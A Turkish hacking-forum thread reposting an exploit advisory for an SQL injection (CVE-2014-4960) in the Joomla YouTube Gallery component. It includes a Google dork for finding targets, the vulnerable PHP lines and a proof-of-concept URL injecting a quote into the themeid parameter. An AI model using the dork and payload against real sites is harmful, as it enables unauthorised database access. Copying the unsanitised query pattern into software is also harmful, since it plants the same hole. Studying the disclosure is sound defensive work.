Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5
Bug: Joomla Youtube Gallery 4.1.7 SQL Injection
#1
# Exploit Title: Joomla component com_youtubegallery - SQL Injection vulnerability
# Google Dork: inurl:index.php?option=com_youtubegallery
# Date: 15-07-2014
# Exploit Author: Pham Van Khanh (phamvankhanhbka@gmail.com)
# Vendor Homepage: http://www.joomlaboat.com/youtube-gallery
# Software Link: http://www.joomlaboat.com/youtube-gallery
# Version: 4.x ( 3.x maybe)
# Tested on: newest version 4.1.7 on Joomla 1.5, 2.5, 3
# CVE : CVE-2014-4960


Detail:
In line: 40, file: components\com_youtubegallery\models\gallery.php,
if parameter listid is int (or can cast to int), $listid and $themeid
will not santinized.
Source code:

PHP Kod:
40: if(JRequest::getInt('listid'))
41: {
42//Shadow Box
43$listid=JRequest::getVar('listid');
44:
45:
46//Get Theme
47$m_themeid=(int)JRequest::getVar('mobilethemeid');
48: if($m_themeid!=0)
49: {
50: if(YouTubeGalleryMisc::check_user_agent('mobile'))
51$themeid=$m_themeid;
52: else
53$themeid=JRequest::getVar('themeid');
54: }
55: else
56$themeid=JRequest::getVar('themeid');
57: }
After$themeid and $listid are used in line 8692. Two method
getVideoListTableRow 
and getThemeTableRow concat string to construct
sql query
So it is vulnerable to SQL Injection.
Source code:
86: if(!$this->misc->getVideoListTableRow($listid))
87: {
88: echo '<p>No video found</p>';
89: return false;
90: }
91:
92: if(!$this->misc->getThemeTableRow($themeid))
93: {
94: echo '<p>No video found</p>';
95: return false;
96: }

# Site POF:
http://server/index.php?option=com_youtubegallery&view=youtubegallery&listid=1&themeid=1'&videoid=ETMVUu
FbToQ&tmpl=component&TB_iframe=true&height=500&width=700 
Beğenenler: xR4TC
#2
Teşekkürler.
Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  Joomla Com_Cckjseblod Auto Exploiter FTP Config İndirme Exploit KingSkrupellos 12 220 01-12-2016, Saat: 08:35
Son Yorum: the_zizil
  WP Premium Gallery Manager Plugin Dosya Yükleme Açığı KingSkrupellos 7 104 27-11-2016, Saat: 15:07
Son Yorum: Efetimi
  WP Reflex Gallery Plugin Shell Yükleme Açığı KingSkrupellos 6 91 23-11-2016, Saat: 16:41
Son Yorum: ferdimeric
  Joomla Upload 1.0 H4Sec 40 1,866 22-11-2016, Saat: 19:27
Son Yorum: Efetimi
  Joomla Com_AdsManager Auto Exploiter PerL PHP Kodu KingSkrupellos 5 131 22-11-2016, Saat: 00:37
Son Yorum: Trajedi
Anahtar Kelimeler

Bug: Joomla Youtube Gallery 4.1.7 SQL Injection indir, Bug: Joomla Youtube Gallery 4.1.7 SQL Injection Videosu, Bug: Joomla Youtube Gallery 4.1.7 SQL Injection Online izle, Bug: Joomla Youtube Gallery 4.1.7 SQL Injection Bedava indir, Bug: Joomla Youtube Gallery 4.1.7 SQL Injection Yükle, Bug: Joomla Youtube Gallery 4.1.7 SQL Injection Hakkında, Bug: Joomla Youtube Gallery 4.1.7 SQL Injection Nedir, Bug: Joomla Youtube Gallery 4.1.7 SQL Injection Free indir, Bug: Joomla Youtube Gallery 4.1.7 SQL Injection Oyunu, Bug: Joomla Youtube Gallery 4.1.7 SQL Injection Download


1 Ziyaretçi